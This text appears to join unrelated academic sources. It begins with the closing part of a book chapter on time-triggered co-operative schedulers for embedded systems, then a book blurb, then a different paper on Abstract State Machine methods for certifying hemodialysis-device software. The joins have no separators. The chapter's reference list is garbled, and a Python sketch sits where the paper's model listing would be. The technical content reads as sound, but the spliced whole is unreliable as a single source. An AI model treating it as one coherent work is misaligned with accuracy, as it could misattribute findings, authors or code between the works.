Table 1. Results obtained in the study detailed in this chapter. The table shows that it is difficult to obtain zero jitter in the release time of the tick in the TTC-SL scheduler, although the tick jitter can still be low. Also, the TTC-SL scheduler always requires a full CPU load (~ 100%). This is because the scheduler does not use the low-power “idle” mode when not executing tasks: instead, the scheduler waits in a “while” loop. In the TTC-ISR scheduler, the tick interrupts occur at precisely-defined intervals with no measurable delays or jitter, and the release jitter in Task A is equal to zero. Inevitably, the memory values in the TTC-Dispatch scheduler are somewhat larger than those required to implement the TTC-SL and TTC-ISR schedulers.
The results from the TTC-TG scheduler are very similar to those obtained from the TTC-Dispatch scheduler, except that it requires slightly more data memory. When the TTC-SD scheduler is used, the low-priority tasks are executed at fixed intervals. However, there is still a little jitter in the release times of Task B and Task C. This jitter is caused by variations in the time taken to leave the software loop – which is used in the SD mechanism to check whether the required release time of the concerned task has been reached – and begin executing the task. With the TTC-MTI scheduler, the jitter in the release times of all tasks running in the system is entirely removed, significantly increasing the overall system predictability. Regarding the ability to deal with task overruns, the TTC-TG scheduler detects and hence terminates the overrunning task at the beginning of the tick following the one in which the task overruns. Moreover, the scheduler allows a backup task to run in the same tick in which the overrun is detected and hence continues to run the following tasks. This means that a one-tick shift is added to the schedule. Also, the TTC-MTI scheduler employs a simple TG mechanism: once an interrupt occurs, the running task (if any) is terminated. Note that the implementation employed here did not support backup tasks.

<table>
<thead>
<tr> <th>Schedule</th> <th>Shut down time (after Ticks)</th> <th>Backup task</th> <th>Comment</th> </tr>
</thead>
<tbody>
<tr> <td>1a</td> <td>---</td> <td>Not applicable</td> <td>Overrunning task is not shut down. The number of elapsed ticks - during overrun - is not counted and therefore tasks due to run in these ticks are ignored.</td> </tr>
<tr> <td>1b</td> <td>---</td> <td>Not applicable</td> <td>Overrunning task is not shut down.
The number of elapsed ticks - during overrun - is counted and therefore tasks due to run in these ticks are executed immediately after the overrunning task ends.</td> </tr>
<tr> <td>2a</td> <td>1 Tick</td> <td>Not available</td> <td>Overrunning task is detected at the time of the next tick and shut down.</td> </tr>
<tr> <td>2b</td> <td>1 Tick</td> <td>Available – BK(A)</td> <td>Overrunning task is detected at the time of the next tick and shut down: a replacement (backup) task is added to the schedule.</td> </tr>
<tr> <td>3a</td> <td>WCET(Ax)</td> <td>Not available</td> <td>Overrunning task is shut down immediately after it exceeds its estimated WCET.</td> </tr>
<tr> <td>3b</td> <td>WCET(Ax)</td> <td>Available – BK(A)</td> <td>Overrunning task is shut down immediately after it exceeds its estimated WCET. A backup task is added to the schedule.</td> </tr>
</tbody>
</table>

Table 2. Examples of possible schedules obtained with task overrun (Nahas, 2008).

9. Conclusions

The particular focus of this chapter was on building embedded systems which have severe resource constraints and require high levels of timing predictability. The chapter provided the definitions necessary to understand scheduling theory and the various techniques used to build a scheduler for the type of systems considered in this study. The discussions indicated that, for such systems, “time-triggered co-operative” (TTC) schedulers are a good match. This is mainly due to their simplicity, low resource requirements and the high predictability they can offer. The chapter, however, also discussed major problems that can affect the performance of TTC schedulers and reviewed some solutions suggested to overcome such problems. The discussion then focused on the relationship between scheduling algorithms and scheduler implementations, and highlighted the challenges faced when implementing software for a particular scheduler.
It was clearly noted that such challenges are mainly caused by the broad range of possible implementation options a scheduler can have in practice, and by the impact of such implementations on the overall system behavior. The chapter then reviewed six different TTC scheduler implementations that can be used for resource-constrained embedded systems requiring highly-predictable system behavior. Useful results from the described schedulers were then provided, including jitter levels, memory requirements and error handling capabilities. The results suggested that a “one size fits all” TTC implementation does not exist in practice, since each implementation has advantages and disadvantages. The selection of a particular implementation will hence be decided based on the requirements of the application in which the TTC scheduler is employed, e.g. its timing and resource requirements.

10. Acknowledgement

The research presented in this chapter was mainly conducted in the Embedded Systems Laboratory (ESL) at the University of Leicester, UK, under the supervision of Professor Michael Pont, to whom the authors are thankful.

11. References

Ways for Implementing Highly-Predictable Embedded Systems Using Time-Triggered Co-Operative (TTC) Architectures

National Instruments (2006) "Low-Cost E Series Multifunction DAQ – 12 or 16-Bit, 200 kS/s, 16 Analog Inputs", available online (Last accessed: November 2010)

Pop et al., 2002

Nowadays, embedded systems – the computer systems that are embedded in various kinds of devices and play important roles in specific control functions – have permeated various aspects of industry. Therefore, we can hardly discuss our life and society from now onwards without referring to embedded systems. For wide-ranging embedded systems to continue their growth, a number of high-quality fundamental and applied research efforts are indispensable.
This book contains 19 excellent chapters and addresses a wide spectrum of research topics on embedded systems, including basic research, theoretical studies, and practical work. Embedded systems can be built only by fusing miscellaneous technologies together. The various technologies condensed in this book will be helpful to researchers and engineers around the world.
Integrating Formal Methods into Medical Software Development: the ASM approach

Paolo Arcaini (a), Silvia Bonfanti (b,c), Angelo Gargantini (b), Atif Mashkoor (c), Elvinia Riccobene (d)

(a) Charles University, Faculty of Mathematics and Physics, Czech Republic
(b) Department of Economics and Technology Management, Information Technology and Production, Università degli Studi di Bergamo, Italy
(c) Software Competence Center Hagenberg GmbH, Austria
(d) Dipartimento di Informatica, Università degli Studi di Milano, Italy

Abstract

Medical devices are safety-critical systems, since their malfunctions can seriously compromise human safety. The correct operation of a medical device depends upon the controlling software, whose development should adhere to certification standards. However, these standards provide general descriptions of common software engineering activities without any indication regarding particular methods and techniques to assure safety and reliability. This paper discusses how to integrate the use of a formal approach into the current normative for medical software development. The rigorous process is based on the Abstract State Machine (ASM) formal method, its refinement principle, and the model analysis approaches the method supports. The hemodialysis machine case study is used to show how the ASM-based design process covers most of the engineering activities required by the related standards, and provides rigorous approaches for medical software validation and verification.

Keywords: Abstract State Machines, medical device software, certification, modeling, validation, verification, hemodialysis device

1. Introduction

Medical devices are increasingly becoming software intensive. This paradigm shift also impacts patients’ safety, as a software malfunction can cause injuries or even death to patients [46].
Therefore, assuring medical software safety and reliability is mandatory, and methods and techniques for medical software validation and verification are highly demanded. Several standards for the validation of medical devices have been proposed – such as ISO 13485 [39], ISO 14971 [40], IEC 60601-1 [37], and EU Directive 2007/47/EC [28] – but they mainly consider hardware aspects of the physical components of a device, and do not mention the software component. The only reference concerning the regulation of medical software is the standard IEC (International Electrotechnical Commission) 62304 [38]. This standard provides a very general description of common life cycle activities of software development, without giving any indication regarding process models, or methods and techniques to assure safety and reliability. The U.S. Food and Drug Administration (FDA), the United States federal executive department that is responsible for protecting and promoting public health through the regulation and supervision of medical devices, although it accepts the IEC 62304 standard, also pushes towards the application of rigorous approaches for software validation. In [60], the FDA defines several broad concepts that can be used as guidance for software validation and verification, and requires these activities to be conducted throughout the software development life cycle. However, no particular technique or method is recommended. Both the IEC standard and the FDA principles aim for more rigorous approaches to certify the software of medical devices [41, 44]. Potential methods should allow writing well-defined models that can be used to guide the software development, to prove that safety-critical properties hold, and to guarantee conformance of the running code to the abstract specification of safe device operation (since, most of the time, software for medical devices is not developed from scratch). To be practical, potential methods should provide tool support for modeling and analysis.
The formal approach based on Abstract State Machines (ASMs) [21] proposes an incremental life cycle model for software development based on model refinement, includes the main software engineering activities (specification, validation, verification, conformance checking), and is tool-supported [13]. Despite their rigorous mathematical foundation, ASMs can be viewed as pseudo-code (or virtual machines) working over abstract data structures. Therefore, ASMs are relatively easy to understand even by non-experts. The method has been successfully applied to numerous case studies [21], also in the context of medical software, as in [3, 15] for the rigorous development of the software of an optometric measurement device, and in [4] for the specification and verification of the Hemodialysis Machine Case Study (HMCS) [48]. Although we believe that the rigor of a formal method can improve the current normative and that ASMs have the required potential, evidence must be given of a possible smooth integration of the method into the standards for medical software development. Additionally, it must be studied to what extent the ASM process complies with the normative: which steps and activities of the IEC standard are covered by using ASMs, and which are not; which FDA principles are ensured, and to what extent. In this paper, we take advantage of the results already presented in [4] for the HMCS to make such a compliance analysis, with the aim of understanding how far we are from proposing an ASM-based process for medical software certification. The current work improves [4] in several aspects: (a) a precise analysis of the advantages and shortcomings of the ASM approach w.r.t.
the current normative for medical software development; (b) the specification and analysis of the HMCS performed at different levels of refinement, to show how validation and verification are continuous activities in the process; (c) model visualization in terms of a graphical notation, to provide better evidence of the software operation; (d) the encoding of a Java prototype of the software controlling the hemodialysis device, in order to show the applicability of conformance checking techniques, thus showing how we deal with the main software engineering activities of the IEC 62304 standard in a formal way. The paper is organized as follows. Sect. 2 introduces the current normative for medical software development. Sect. 3 briefly presents the ASM-based development process. Sect. 4 discusses the compliance of the ASM process w.r.t. the normative: it shows how the steps and principles of the IEC and FDA standards are fulfilled by the ASM-based process. Sect. 5 takes advantage of the HMCS to show the application of the ASM process to a medical device for which a certification could be required; it first presents the specification of the HMCS by means of four levels of model refinement (at each level, all possible results concerning requirements validation and property verification are reported); then, it describes a Java prototype of the software controlling the machine, and a technique for conformance checking. Sect. 6 compares our approach with other formal approaches applied to the formalization of medical software and, in particular, to the HMCS. Sect. 7 concludes the paper.

2. Normative for medical software

Currently, the main normative for the development and analysis of medical software is the standard IEC 62304 [38] and the “General Principles of Software Validation” [60] established by the FDA. We here briefly recall such regulations and their underlying principles, since we later want to analyze which of their activities can be covered by the use of the ASM-based design process.
2.1. IEC 62304 standard

The standard IEC 62304 classifies medical software into three classes on the basis of the potential injuries caused by software malfunctions, and defines the life cycle activities (points 5.1-5.8 of Sect. 5 in [38], also shown in Fig. 1) that have to be performed and appropriately documented when developing medical software. Each activity is split into tasks that are mandatory or not depending on the software class. The standard does not prescribe a specific life cycle model, nor does it give indications on the methods and techniques to apply. Users are responsible for mapping the adopted life cycle model to the standard. Step (5.1) essentially consists in defining a life cycle model, planning procedures and deliverables, choosing standards, methods and tools, establishing which activity requires verification, and how to achieve traceability among system requirements, software requirements, software tests, and risk control. Step (5.2) consists in defining and documenting functional and non-functional software requirements. It also requires checking for traceability between software requirements and system requirements, including risk control measures in the software requirements, and re-evaluating the risk analysis on the established software requirements. Step (5.3) regards the specification of the software architecture from the software requirements. It requires to describe the software structure, identify software elements, specify functional and performance requirements for the software elements, identify software elements related to risk control, and verify the software architecture w.r.t. the software requirements. Step (5.4) regards the refinement of the software architecture into software units. Steps (5.5 - 5.7) regard software implementation and testing at the unit, integration, and system levels. Step (5.8) includes the demonstration, by a device manufacturer, that the software has been validated and verified.

2.2.
FDA General Principles of Software Validation

The FDA accepts the standard IEC 62304 for all levels of concern and pushes for an integration of software life cycle management and risk management activities. The organization promotes the use of formal approaches for software validation and verification (V&V), and establishes the following general principles [60] as guidelines:

1. A documented software requirements specification should provide a baseline for both V&V.
2. Developers should use a mixture of methods and techniques to prevent and to detect software errors.
3. Software V&V should be planned early and conducted throughout the software life cycle.
4. Software V&V should take place within the environment of an established software life cycle.
5. The software V&V process should be defined and controlled through the use of a plan.
6. The software V&V process should be executed through the use of procedures.
7. Software V&V should be re-established upon any (software) change.
8. Validation coverage should be based on the software complexity and safety risks.
9. V&V activities should be conducted using the quality assurance precept of “independence of review.”
10. The device manufacturer has flexibility in choosing how to apply these V&V principles, but retains ultimate responsibility for demonstrating that the software has been validated.

3. ASM-based development process

Abstract State Machines (ASMs) are transition systems that extend Finite State Machines by replacing unstructured control states with algebraic structures, i.e., domains of objects with functions and predicates defined on them. A state represents the instantaneous configuration of the system, and transition rules describe the state updates. There is a limited but powerful set of rule constructors: if-then for guarded actions, par for simultaneous parallel actions, choose for nondeterminism (existential quantification), forall for unrestricted synchronous parallelism (universal quantification).
A macro rule is a “named” rule that can be invoked at any point of the model. A run is a (finite or infinite) sequence of states \( s_0, s_1, \ldots, s_n, \ldots \), where each \( s_i \) is obtained by applying the transition rules at \( s_{i-1} \). Functions can be of different types. In particular, controlled functions can be updated by transition rules and represent the internal memory of the ASM; monitored functions, instead, cannot be updated by transition rules, but only by the environment, and represent the inputs of the machine. As shown in Fig. 2, the ASM-based development process is carried out in an iterative and incremental fashion. The ASMETA (ASM mETAmodeling) framework\(^1\) [13] provides different formal activities supporting the process. Requirements modeling is based on model refinement; it starts by developing a high-level ground model (ASM 0 in Fig. 2) that correctly captures the stakeholders’ requirements, and consistently (i.e., free from specification inconsistencies) reflects the intended system behavior. However, the ground model does not need to be complete, i.e., it may not specify all stakeholder requirements. ASM specifications can be edited using a concrete syntax [33] in a textual editor, and graphically visualized [5]. Starting from the ground model, through a sequence of refined models, further functional requirements can be specified and a complete architecture of the system is defined. At each refinement step, if a particular kind of refinement (called stuttering refinement) has been applied, refinement correctness can be automatically checked by the refinement prover [11]. Otherwise, a manual proof must be supplied. The refinement process can stop at any desired level of detail, possibly providing a smooth transition from specification to implementation, which can be seen as the last low-level refinement step. At each level of refinement, different validation and verification (V&V) activities can be performed.
Model validation is possible by means of an interactive simulator [33] and a validator [26], which allows building and executing scenarios of expected system behaviors. Automatic model review (a form of static analysis) is also possible: it allows checking whether a model has sufficient quality attributes (i.e., minimality, completeness, and consistency). Property verification of ASMs is possible by means of a model checker [6] that verifies both Computation Tree Logic (CTL) and Linear Temporal Logic (LTL) formulas. The implementation can be either automatically derived from the model [19] or externally provided. In the former case, conformance w.r.t. the specification should be assured by the translator; in the latter case, conformance checking must be performed. Both Model-Based Testing (MBT) and Runtime Verification can be applied to check whether the implementation conforms to its specification [10]. We support conformance checking w.r.t. Java code. The MBT feature of ASMETA [32] can be used to automatically generate tests from ASM models and, therefore, to check conformance offline; the support for runtime verification [8], instead, can be used to check conformance online.

4. ASM-based certification

The ASM-based process can be used for developing the software of (distributed) medical devices whose (continuous) behaviour can be discretized into a set of states and transitions between them. We are not able to deal with continuous time, although a notion of reactive timed ASMs [56] has been proposed. We here discuss how compliant the ASM-based process is w.r.t. the existing normative in the field of medical software: which activities of the IEC standard can be covered by the use of ASMs, which FDA principles are ensured by the use of ASMs, how the rigor of a formal method such as ASMs can improve the current normative, and what cannot be captured by, or is out of the scope of, ASMs.
The aim of this analysis is to understand how far we are from proposing an ASM-based process for medical software certification.

4.1. Compliance of the ASM process with the IEC standard

Regarding step (5.1) of the IEC 62304 standard, ASMs can supply a precise iterative and incremental life cycle model based on model refinement. Life cycle procedures are modeling, validation, verification, and conformance checking, the last applicable also in the maintenance phase. Deliverables are given in terms of a sequence of refined models, each one equipped with validation and verification results. Traceability is given, at each refinement step, by the conformance relation between abstract and refined models. ASMs do not support activities peculiar to risk management, although ASM formal verification can be used to check the absence of the risks identified by risk analysis. However, risk management sometimes requires assessing the probability of risk occurrence: ASMs do not yet have mature support for such probabilistic analysis. Once the ASM-based process is established as the development model, the subsequent life cycle activities (steps 5.2-5.7) prescribed by the standard can be devised precisely. When a formal method is used, (software) system requirements (step 5.2) and design (steps 5.3-5.4) are expressed in detail by means of a mathematical model, carefully analyzed and checked before the implementation is developed. When developing such a formal model, one has to translate the informal requirements, which are expressed in natural language, diagrams, and tables, into a mathematical language with a formally defined semantics [58]. Informal requirements are the result of the requirements gathering activity (also required by step 5.2), which is out of the scope of the ASM method; complementary techniques should thus be used for this purpose.
An example of informal requirements is the HMCS description in [48], which constitutes our input document to cover steps 5.2 to 5.4 for the case study. There is a tight feedback loop between the informal requirements description and the formal specification. Indeed, one of the main benefits of the formal specification is its ability to uncover problems and ambiguities in the informal requirements. Note that the pseudo-code style and freedom of abstraction in ASMs allow requirements to be captured at a very high level of abstraction, in a form that is understandable by the stakeholders. Furthermore, ASMs are particularly suitable for modeling functional requirements, while non-functional requirements cannot be easily handled. Thanks to the model refinement mechanism, steps (5.2 - 5.4) are covered by the continuous activity of modeling and verifying software requirements along the ASM process, up to the desired level of refinement, possibly down to code level. For the HMCS, this is what is reported in Sect. 5.2 (up to a prototypical Java implementation of the case study – see Sect. 5.3). Already at the ground level, software structure is captured, even if not completely, by the model signature (i.e., domains and functions defined on them), while software behavior is specified by means of transition rules. Model refinement and decomposition can help manage the complexity of systems and move from a global view of the system to a component (or unit) view. Design decisions and architectural choices are added along model refinement. For example, for the HMCS, different operation phases are introduced through different levels of refinement, and patient treatments, error handling, and property verification are increasingly dealt with at each level. Risk control is performed in terms of verification of required (functional) safety properties, assurance of quality properties, and design of critical scenarios. Steps (5.5 - 5.7) concern code and testing.
Although in ASMs a code prototype could be obtained through a translator as the last model refinement step, we usually expect code to be developed by a vendor and implemented using powerful programming techniques and languages. Thus, the ASM process does not fully cover these development steps. However, having executable models available, ASM techniques for conformance checking (model-based testing and runtime verification) are applicable. This is shown for the HMCS in Sect. 5.3 by using a prototypical Java implementation. Regarding step (5.8), if a device manufacturer adopts the ASM process, demonstrating that software has been validated and verified is straightforward, since validation and verification are continuous activities along the process, and conformance checking is possible on the subsequent released versions of the software.

4.2. Compliance of the ASM process with the FDA principles

By proposing the ASM process for medical software development, we respond to the request for formal approaches to software validation and verification that the FDA promotes. Here, we discuss how ASM V&V activities achieve the FDA principles. We still miss a way to integrate software life cycle management and risk management. Using ASMs, requirements are specified and documented by means of a chain of models providing a rigorous baseline for both validation and verification. Continuous defect prevention is supported: at each modeling level, faults and unsafe situations can be checked. Safety properties are proved on models, while software testing for conformance verification of the implementation is possible. The ASM process allows preparation for software validation and verification as early as possible, since V&V can start at the ground level. These activities are part of the process, can be planned at different abstraction levels, are documented, and are supported by precise procedures, i.e., methods and techniques.
If changes regard only the software implementation and do not affect the model, our process requires re-running conformance checking only; if a software change requires revising the specification at a certain level, then refinement correctness must be re-proved and V&V re-executed from the concerned level down to the implementation. Regarding validation coverage, by simulation and testing we can collect coverage in terms of rules or code covered. This can be used by the designer to estimate whether the validation activity is commensurate with the risk associated with the use of the software for the specified intended use. Since V&V are performed by exploiting unambiguous mathematically-based techniques, they facilitate independent evaluation of software quality assurance. The ASM process allows a device manufacturer to demonstrate that the software has been validated and verified: if an implementation is obtained as the last model refinement step, it is correct-by-construction due to the proof of refinement correctness; if the code has been developed by a vendor, conformance checking can guarantee correctness w.r.t. a verified model.

5. Hemodialysis device case study

In this section, we exemplify the application of the ASM-based development process by providing a formal specification of the HMCS. In Sect. 5.1 we provide a brief description of the case study. In Sect. 5.2 we show how the ASM method can be used to support (in a formal way) the activities required by steps 5.2-5.4 of the IEC 62304 standard, and in Sect. 5.3 how it supports those required by steps 5.5-5.7. We also show how the FDA principles are concretely fulfilled by the early and continuous V&V activities of the ASM process.

Due to space limitations, we are not able to report the long list of requirements presented in [48]. The reader can also access the document from http://www.cdcc.faw.jku.at/ABZ2016/HD-CaseStudy.pdf.

5.1.
Case study description

Hemodialysis is a medical treatment that uses a device to clean the blood. The hemodialysis device transports the blood from and to the patient, filters wastes and salts from the blood, and regulates the fluid level of the blood. The connection between the patient and the device is surgically created by means of a venous and an arterial access. During the therapy, the device extracts the blood through the arterial access. The dialyser separates the metabolic waste products from the blood. At the end, the clean blood is pumped back to the patient. A therapy session is divided into three phases: preparation, initiation, and ending. The first operation executed in the preparation phase is an automatic test that checks all the device functionalities. After that, the concentrate for the therapy is connected and a nurse sets all rinsing parameters. The tubing system is connected to the machine and filled with saline solution. Afterwards, the nurse prepares the heparin pump and inserts the treatment parameters. At the end of the preparation phase, the dialyser is connected to the machine and rinsed with the saline solution. During the initiation phase, the patient is connected to the device through the arterial access and the tubes are filled with blood until the venous red detector (VRD) sensor detects that they are full. Subsequently, the patient is connected venously and the therapy starts. During the therapy, the blood is extracted by the blood pump (BP) and is cleaned by the dialyser using the dialysing fluid (DF). When the therapy is finished, the machine starts the ending phase. The patient is disconnected arterially and the saline solution is infused venously. When the solution has been completely infused, the patient is also disconnected venously. After that, the dialyser and the cartridge are emptied. Finally, an overview of the therapy is shown on the device display.

5.2.
Modeling by refinement

In modeling the HMCS, we proceeded through refinement. A peculiarity of the case study [48] is that the device behavior is clearly divided into phases, each characterized by the execution of activities (or sub-phases), as shown in Table 1. At the highest level of abstraction, the ground model gives the overall abstract view of the whole device, which goes through three phases: the PREPARATION of the device, the execution (or INITIATION\(^3\)) of the therapy, and the termination (or ENDING) of the process. Then, we proceeded by refining each of these phases. Each refinement step models all the (possible) activities – which lead the device to go through specific sub-phases – performed in the phase and all the controls that are done, with the related errors and alarms. The deepest nesting is four levels, since in phase INITIATION the activity THERAPY_RUNNING requires that THERAPY_EXEC considers subsequent operations on the arterialBolus. Fig. 3 reports some data on the chain of the four models that form the complete specification. While the ground model is rather simple, having no monitored function and no requirement property, all refinements add functions of all types, rules, and properties, depending on the phase they refer to. Note that the second refinement allows proving the majority of requirements (40 more w.r.t. the previous refinement), since it models the main part of the therapy.

5.2.1. Ground model

As said before, the ground model simply describes the transitions between the phases constituting a hemodialysis treatment, without any additional detail. Code 1 shows the ground model written using the ASMETA concrete syntax. The main rule simply executes rule r_run_dialysis that, depending

\(^3\)Note that we use INITIATION to denote this phase to be consistent with the case study [48], although the term is misleading.
Figure 3: Models data

<table>
<thead>
<tr> <th>refinement</th> <th>#monitored functions</th> <th>#controlled functions</th> <th>#derived functions</th> <th>#rule declarations</th> <th>#rules</th> <th>#properties</th> </tr>
</thead>
<tbody>
<tr> <td>Ground model</td> <td>0</td> <td>1</td> <td>8</td> <td>5</td> <td>11</td> <td>0</td> </tr>
<tr> <td>1st - preparation phase</td> <td>52</td> <td>17</td> <td>8</td> <td>68</td> <td>242</td> <td>6</td> </tr>
<tr> <td>2nd - initiation phase</td> <td>91</td> <td>36</td> <td>14</td> <td>143</td> <td>578</td> <td>46</td> </tr>
<tr> <td>3rd - ending phase</td> <td>101</td> <td>39</td> <td>15</td> <td>159</td> <td>648</td> <td>52</td> </tr>
</tbody>
</table>

Table 1: Hemodialysis device phases

<table>
<thead>
<tr> <th>phase</th> <th>sub-phase function</th> <th>activities (sub-phases)</th> </tr>
</thead>
<tbody>
<tr> <td>PREPARATION</td> <td>prepPhase</td> <td>AUTO_TEST, CONNECT_CONCENTRATE, SET_RINSING_PARAM, TUBING_SYSTEM (tubingSystemPhase), PREPARE_HEPARIN, SET_TREAT_PARAM (treatmentParam), RINSE_DIALYZER (rinsePhase)</td> </tr>
<tr> <td>INITIATION</td> <td>initPhase</td> <td>CONNECT_PATIENT (patientPhase), THERAPY_RUNNING (therapyPhase, arterialBolusPhase)</td> </tr>
<tr> <td>ENDING</td> <td>endingPhase</td> <td>REINFUSION (reinfusionPhase), ...</td> </tr>
</tbody>
</table>

on the current phase, executes the corresponding rule:

- \textit{r\_run\_preparation}, refined in the first refinement step (see Sect. 5.2.2);
- \textit{r\_run\_initiation}, refined in the second refinement step (see Sect. 5.2.3);
- \textit{r\_run\_ending}, refined in the third refinement step (see Sect. 5.2.4).

Code 1: Ground model

Fig. 4 shows a graphical representation [5] of the ground model, in the two ways supported by ASMETA: \textit{basic visualization} and \textit{semantic visualization}. The basic visualization shows the syntactical structure of the ASM in terms of a tree (similar to an AST); the notation is inspired by the classical flowchart notation, using green rhombuses for guards and grey rectangles for rules. The leaves of the tree are the update rules and the macro call rules.
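The control flow of the ground model described above can be emulated in a few lines of Python, as a hedged re-rendering of the dispatch on the current phase (not the AsmetaL text of Code 1 itself; the *_done inputs stand in for monitored conditions that are only introduced in later refinements):

```python
# Sketch of the ground model's r_run_dialysis: dispatch on the current
# phase and let each phase rule decide when to advance. The *_done flags
# are illustrative stand-ins for monitored inputs of later refinements.

def r_run_dialysis(phase, preparation_done, initiation_done):
    if phase == "PREPARATION":
        return "INITIATION" if preparation_done else "PREPARATION"
    if phase == "INITIATION":
        return "ENDING" if initiation_done else "INITIATION"
    return "ENDING"    # r_run_ending does not modify the phase

phase = "PREPARATION"
for step_inputs in [(False, False), (True, False), (False, True)]:
    phase = r_run_dialysis(phase, *step_inputs)
print(phase)   # ENDING
```

The run above goes through all three top-level phases, mirroring the semantic visualization of Fig. 4b.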
For each macro rule in the model, there is a tree representing the definition of the rule; double-clicking on a macro call rule shows the tree of the corresponding macro rule. The basic visualization of the model of Code 1 (starting from rule \textit{r\_run\_dialysis}) is shown in Fig. 4a. The figure shows the visualization provided by the tool when all the macro rules are shown (i.e., the user has double-clicked on all the call rules). The semantic visualization provides a more advanced way of representing ASMs, trying to extrapolate part of the behavior from the model. As observed before, some systems naturally evolve through phases (or modes), called control states in [21], that are represented by a suitable function of the model (called the phase function). Phases and transitions between them can sometimes be statically identified directly in the model. This visualization tries to identify a phase function in the model and shows how the system evolves through these phases by the execution of the transition rules. The visualization consists of a graph where control states are shown using orange ellipses. Note that a control state is not an ASM state, but an abstraction of a set of ASM states having the same value for the phase function. The semantic visualization of the ground model is shown in Fig. 4b. The system starts in the PREPARATION phase and moves to the INITIATION phase by executing rule \texttt{r\_run\_preparation}, from which it moves to the ENDING phase by the execution of rule \texttt{r\_run\_initiation}. In the ENDING phase, rule \texttt{r\_run\_ending} is executed, which, however, does not modify the phase. This simple visual inspection was sufficient to give us confidence that the model correctly evolves through the three top-level phases. In the following refinement steps, we will only show the semantic visualizations of the models. The complete textual specifications are available online\(^4\).

5.2.2.
First refinement: preparation phase

The first refinement extends the ground model by refining the PREPARATION phase. As shown in Fig. 5a, the preparation consists of a sequence of activities, specified by function \texttt{prepPhase}. For each value of \texttt{prepPhase}, a given rule performs some actions related to the device preparation and updates \texttt{prepPhase} to the next value. Examples of these activities are the concentrate connection and the dialyzer rinsing. As shown in Table 1, some phases are further divided into sub-phases. For example, Fig. 5b shows how phase \texttt{SET\_TREAT\_PARAM} is specified by the treatment parameter (function \texttt{treatmentParam}). Also in this case, the sub-phases are executed in sequence. The correctness of each refinement step has been proved with the refinement prover integrated in ASMETA, which checks a particular kind of refinement called stuttering refinement [11]. A model \( R \) is a correct stuttering refinement of a model \( A \) iff for each run \( \rho^R \) of \( R \) there is a run \( \rho^A = S_1, S_2, \ldots, S_n \) of \( A \) such that \( \rho^R \) can be split into sub-runs \( \rho_1^R, \rho_2^R, \ldots, \rho_n^R \) where all the states of \( \rho_i^R \) are conformant with \( S_i \) (\( i = 1, \ldots, n \)), according to a given conformance relation \( \equiv \). As conformance relation, we usually use the equality between some selected locations (called locations of interest) of the two models. The first refined model is a correct stuttering refinement of the ground model, using as conformance relation the equality on the phase function. Fig. 6 shows the correspondence of a refined run with an abstract run. We can see that, in the run of the ground model (the abstract run), the machine goes from a state in which phase is PREPARATION to a state in which phase is INITIATION in one step.

\(^4\)Models are available at \url{http://fmse.di.unimi.it/sw/SCP2017.zip}
Instead, in the run of the refined model (the refined run), there is a sequence of intermediate states in which phase remains PREPARATION. These states are all conformant with the first abstract state. The state in the refined run in which phase becomes INITIATION is conformant with the second abstract state.

**Validation and Verification.** Starting from the first refinement, we applied model review. Common vulnerabilities and defects that can be introduced during ASM modeling are checked as violations of suitable meta-properties (MPs, defined in [7] as CTL formulae). The violation of a meta-property means that a quality attribute (minimality, completeness, consistency) is not guaranteed, and it may indicate the presence of an actual fault (i.e., the ASM is indeed faulty) or only of a stylistic defect (i.e., the ASM could be written in a better way). In this model, we found that controlled function machine.state was initialized but never updated (a violation of meta-property MP7, which requires that every controlled location is updated and every location is read). Although this is not a real fault of the model, it could make the model less readable, since a reader may expect an update of the function (since it is controlled). Declaring the function static made it apparent that, in this refinement step, the function is not updated. When modeling other case studies [3, 12, 14], we extensively used interactive simulation [33], which allowed us to observe some particular system executions. In this case study, we could largely reduce the effort spent in simulation, since semantic visualization gave us feedback on the control flow similar to that provided by simulation. Fig. 7 shows a simulation trace (two steps) of the current model: the values chosen by the user for the monitored functions are shown in the monitored part of the state, while the updates computed by the machine are shown in the controlled part.
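The stuttering-conformance relation between a refined run and an abstract run can be sketched as a simple trace check (an illustrative Python check, not the ASMETA refinement prover, which works on models rather than traces; conformance here is equality on the phase location):

```python
# Check that a refined run is a stuttering refinement of an abstract run
# w.r.t. a conformance relation (here: equality of the 'phase' location).
# Illustrative only -- the ASMETA prover verifies this on models.

def conforms(refined_state, abstract_state):
    return refined_state["phase"] == abstract_state["phase"]

def stuttering_refinement(refined_run, abstract_run):
    i = 0   # index of the current abstract state S_i
    for rs in refined_run:
        if conforms(rs, abstract_run[i]):
            continue                                  # still stuttering in S_i
        if i + 1 < len(abstract_run) and conforms(rs, abstract_run[i + 1]):
            i += 1                                    # moved on to S_{i+1}
        else:
            return False                              # conforms to neither state
    return i == len(abstract_run) - 1                 # whole abstract run covered

abstract = [{"phase": "PREPARATION"}, {"phase": "INITIATION"}]
refined = [{"phase": "PREPARATION"}] * 3 + [{"phase": "INITIATION"}]
print(stuttering_refinement(refined, abstract))   # True
```

The three PREPARATION states of the refined run all map onto the first abstract state, exactly as in Fig. 6.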
Transitions between phases can also be discovered through simulation, but in a less direct way than with semantic visualization (see Fig. 5a). A further advantage of semantic visualization is that it also shows the rule that changes a given phase. However, simulation shows ASM states, whereas semantic visualization only shows control states given by the value of the phase function. Therefore, if we are interested in observing the exact ASM runs, we still have to use simulation. Instead, if we are only interested in knowing how the machine evolves through its phases, the semantic visualization is enough.

Figure 6: Hemodialysis case study – Relation between a refined run and an abstract run

Instead of interactive simulation, we mainly performed scenario-based validation [26], which makes it possible to automate the simulation activity, so that scenarios can be re-run after specification modifications. In scenario-based validation the designer writes a scenario specifying the expected behavior of the model; scenarios are similar to test cases. The validator reads the scenario and executes it using the simulator. The validator language provides constructs to express scenarios as interaction sequences consisting of actions committed by the user to set the environment (i.e., the values of monitored/shared functions), to check the machine state, to ask for the execution of certain transition rules, and to force the machine itself to make one step (or a sequence of steps, by command step until) as a reaction to the user's actions. We wrote several scenarios for the different refinement steps. We discovered that such scenarios had several common parts, since they had to perform the same actions and the same checks in different parts of their evolution. Therefore, we extended the validator with the possibility of defining blocks of actions that can be reused in different scenarios: a block is a named sequence of commands delimited by the keywords begin and end.
A command block can be defined in any scenario and can be called by means of the command execblock in other parts of the same scenario or in other scenarios. A block can also be nested in another block.

Code 2: Scenario for the first refinement

